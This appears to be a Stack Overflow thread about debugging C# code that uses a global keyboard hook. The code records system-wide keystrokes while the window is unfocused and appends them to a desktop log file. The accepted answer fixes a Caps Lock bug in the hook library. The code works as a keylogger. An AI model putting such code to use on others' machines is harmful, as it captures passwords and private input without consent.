# C# KeyEventArgs giving out wrong outputs when caps is on

Tags: c#, keyboard, keylistener, keyeventargs

I'm using [global keyboard hooks](http://www.jonegerton.com/dotnet/determining-the-state-of-modifier-keys-when-hooking-keyboard-input/) as a keyboard listener when the window is out of focus. I'm half way through some code and I realise that for whatever reason, putting caps lock on changes the output of `KeyEventArgs`. Using shift/no shift outputs ordinary results but if I were to put caps lock on, A will become U, B will become V, C will become W and so on. Here's a look at the code that does this (will add global keyboard hooks if necessary):

```
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using Utilities;

namespace WindowsFormsApplication1
{
public partial class Form6 : Form
{
    globalKeyboardHook gkh = new globalKeyboardHook();

    int sign_Indicator = 0;
    double variable1;
    double variable2;
    int addBit = 0;
    int subBit = 0;
    int multBit = 0;
    int divBit = 0;
    int modBit = 0;
    Boolean fl = false;
    String s, x;
    public Form6()
    {
        InitializeComponent();
    }

    private void Form6_Load(object sender, EventArgs e)
    {
        gkh.HookedKeys.Add(Keys.A);
        gkh.HookedKeys.Add(Keys.B);
        gkh.HookedKeys.Add(Keys.C);
        gkh.HookedKeys.Add(Keys.D);
        gkh.HookedKeys.Add(Keys.E);
        gkh.HookedKeys.Add(Keys.F);
        gkh.HookedKeys.Add(Keys.G);
        gkh.HookedKeys.Add(Keys.H);
        gkh.HookedKeys.Add(Keys.I);
        gkh.HookedKeys.Add(Keys.J);
        gkh.HookedKeys.Add(Keys.K);
        gkh.HookedKeys.Add(Keys.L);
        gkh.HookedKeys.Add(Keys.M);
        gkh.HookedKeys.Add(Keys.N);
        gkh.HookedKeys.Add(Keys.O);
        gkh.HookedKeys.Add(Keys.P);
        gkh.HookedKeys.Add(Keys.Q);
        gkh.HookedKeys.Add(Keys.R);
        gkh.HookedKeys.Add(Keys.S);
        gkh.HookedKeys.Add(Keys.T);
        gkh.HookedKeys.Add(Keys.U);
        gkh.HookedKeys.Add(Keys.V);
        gkh.HookedKeys.Add(Keys.W);
        gkh.HookedKeys.Add(Keys.X);
        gkh.HookedKeys.Add(Keys.Y);
        gkh.HookedKeys.Add(Keys.Z);
        gkh.HookedKeys.Add(Keys.D1);
        gkh.HookedKeys.Add(Keys.D2);
        gkh.HookedKeys.Add(Keys.D3);
        gkh.HookedKeys.Add(Keys.D4);
        gkh.HookedKeys.Add(Keys.D5);
        gkh.HookedKeys.Add(Keys.D6);
        gkh.HookedKeys.Add(Keys.D7);
        gkh.HookedKeys.Add(Keys.D8);
        gkh.HookedKeys.Add(Keys.D9);
        gkh.HookedKeys.Add(Keys.D0);
        gkh.HookedKeys.Add(Keys.Return);
        gkh.HookedKeys.Add(Keys.Shift);
        gkh.HookedKeys.Add(Keys.CapsLock);
        gkh.HookedKeys.Add(Keys.Back);
        gkh.HookedKeys.Add(Keys.Escape);
        gkh.HookedKeys.Add(Keys.Space);
        gkh.HookedKeys.Add(Keys.OemPeriod);
        gkh.HookedKeys.Add(Keys.Oemcomma);
        gkh.HookedKeys.Add(Keys.OemMinus);
        gkh.HookedKeys.Add(Keys.Oemplus);
        gkh.HookedKeys.Add(Keys.OemPipe);
        gkh.HookedKeys.Add(Keys.OemBackslash);
        gkh.HookedKeys.Add(Keys.OemOpenBrackets);
        gkh.HookedKeys.Add(Keys.OemCloseBrackets);
        gkh.HookedKeys.Add(Keys.OemQuotes);
        gkh.HookedKeys.Add(Keys.OemSemicolon);
        gkh.HookedKeys.Add(Keys.Oemtilde);

        gkh.KeyDown += new KeyEventHandler(gkh_KeyDown);
    }

    public static string location = "C:\\Users\\Hayden\\Desktop\\log.txt";

    void gkh_KeyDown(object sender, KeyEventArgs e)
    {
        if (e.Modifiers == Keys.Shift)
        {
            if (e.KeyCode == Keys.OemPipe)
            {
                System.IO.File.AppendAllText(@location, "|");
            }
            else
            {
                System.IO.File.AppendAllText(@location, e.KeyCode.ToString());
            }
        }
        else
        {
            if (e.KeyCode == Keys.Return)
            {
                System.IO.File.AppendAllText(@location, "[RETURN]");
            }
            else if (e.KeyCode == Keys.Back)
            {
                System.IO.File.AppendAllText(@location, "[BACKSPACE]");
            }
            else if (e.KeyCode == Keys.Space)
            {
                System.IO.File.AppendAllText(@location, " ");
            }
            else if (e.KeyCode == Keys.OemPeriod)
            {
                System.IO.File.AppendAllText(@location, ".");
            }
            else if (e.KeyCode == Keys.Oemcomma)
            {
                System.IO.File.AppendAllText(@location, ",");
            }
            else if (e.KeyCode == Keys.OemPipe)
            {
                System.IO.File.AppendAllText(@location, "\\");
            }
            else if (e.KeyCode == Keys.CapsLock)
            {
                System.IO.File.AppendAllText(@location, "");
            }
            else if (Control.IsKeyLocked(Keys.CapsLock))
            {
                System.IO.File.AppendAllText(@location, e.KeyCode.ToString());
            }
            else
            {
                System.IO.File.AppendAllText(@location, e.KeyCode.ToString().ToLower());
            }
        }
    }
```

How can I fix this? I have *no* idea why it's changing the letter completely just because I put caps lock on. Shift works fine though.

Comment: Completely unrelated to your question, but why not set `location` using `@"C:\Users\...` and make it more readable?  I don't think `@location` will be making any difference since the value of `location` is already being set to `C:\Users\...` by using the escaped backslash.

Comment: I originally used the location in each file.appendalltext and assumed you still had to use the @. Fixed it, works fine. Thanks. ;)

Answer (score 1, accepted):

The `globalKeyboardHook` class you link to has a `AddModifiers(Keys key)` method with this line:

```
if ((GetKeyState(VK_CAPITAL) & 0x0001) != 0) key = key | Keys.CapsLock;
```

This code checks if Cap Lock is on and if so it ORs the `key` variable which is later returned by the method.

The problem is that Caps Lock is not a modifier key and shouldn't be manipulated this way. This is the reason you're seeing the strange key values you are when Caps Lock in on.

Incidentally, only Control, Shift and Alt are modifier keys and `AddModifiers()` handles these.

If you remove this line I believe you'll be fine.

Comment: Thanks! It worked. I make common, simple mistakes all of the time but I don't think I would have ever spotted/fixed that on my own.

Comment: @HaydenPerry Glad I can help.  You're like me then: if there's a problem it must have been something _we_ did wrong.  We gotta stop doing that.  One thing that really helped with this was putting a breakpoint at the entry point of `gkh_KeyDown` and examining the value of `e.KeyCode`.